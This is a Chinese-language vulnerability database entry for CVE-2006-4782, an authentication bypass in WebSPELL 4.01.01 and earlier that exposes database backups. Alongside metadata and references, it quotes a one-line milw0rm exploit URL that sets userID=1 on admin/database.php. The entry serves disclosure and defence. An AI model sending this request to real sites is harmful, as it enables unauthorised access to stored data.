WebSPELL 'Database.PHP'认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111010 漏洞类型 输入验证
发布时间 2006-09-12 更新时间 2007-07-06
CVE编号 CVE-2006-4782 CNNVD-ID CNNVD-200609-261
漏洞平台 PHP CVSS评分 5.4
|漏洞来源
https://www.exploit-db.com/exploits/2352
https://www.securityfocus.com/bid/19975
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-261
|漏洞详情
WebSPELL4.01.01及更早版本中的src/index.php,在启用register_globals时,可让远程攻击者通过对admin/database.php执行写入操作时修改的userID参数来绕过认证并获取存储在数据库中的敏感信息。
|漏洞EXP
# WebSPELL <= 4.01.01 Accessible Database Backup Download Exploit
# Discovered by: Trex
# Visit: www.SecuritySector.org / www.UnderGround.ag

# Exploit:
http://[SITE]/[PATH]/admin/database.php?action=write&userID=1

# Solution:
http://cms.webspell.org/index.php?site=files&file=15

# milw0rm.com [2006-09-12]
|受影响的产品
webSPELL webSPELL 4.1.1 webSPELL webSPELL 4.1 webSPELL webSPELL 4.0
|参考资料

来源:BID
名称:19975
链接:http://www.securityfocus.com/bid/19975
来源:VUPEN
名称:ADV-2006-3572
链接:http://www.frsirt.com/english/advisories/2006/3572
来源:SECUNIA
名称:21881
链接:http://secunia.com/advisories/21881
来源:MILW0RM
名称:2352
链接:http://milw0rm.com/exploits/2352
来源:cms.webspell.org
链接:http://cms.webspell.org/index.php?site=files&file=15
来源:XF
名称:webspell-login-authentication-bypass(28896)
链接:http://xforce.iss.net/xforce/xfdb/28896